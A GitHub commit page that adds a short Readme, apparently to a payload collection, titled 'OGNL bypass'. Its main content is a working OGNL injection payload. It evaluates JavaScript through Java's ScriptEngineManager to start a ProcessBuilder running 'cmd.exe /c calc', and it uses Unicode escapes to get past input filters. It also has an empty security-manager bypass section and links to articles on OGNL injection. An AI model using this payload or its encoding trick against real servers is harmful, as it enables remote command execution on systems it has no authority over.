Skip to content

Commit 5f51de9

Browse files
FirebaskyFirebasky
authored
Update Readme.md
1 parent 24f781b commit 5f51de9

1 file changed

Lines changed: 15 additions & 0 deletions

File tree

shell/OGNL/Readme.md

Lines changed: 15 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -1 +1,16 @@
11
# OGNL bypass
2+
```java
3+
new javax.script.ScriptEngineManager().getEngineByName("js").eval(此处的Payload可以进行unicode编码)
4+
5+
new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['cmd.exe','/c','calc']).start()\u003B");
6+
7+
```
8+
## bypass sm
9+
参考 js的bypass
10+
```java
11+
12+
```
13+
14+
>参考
15+
>https://www.sec-in.com/article/753
16+
>https://www.mi1k7ea.com/2020/03/16/OGNL%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93/

0 commit comments

Comments
 (0)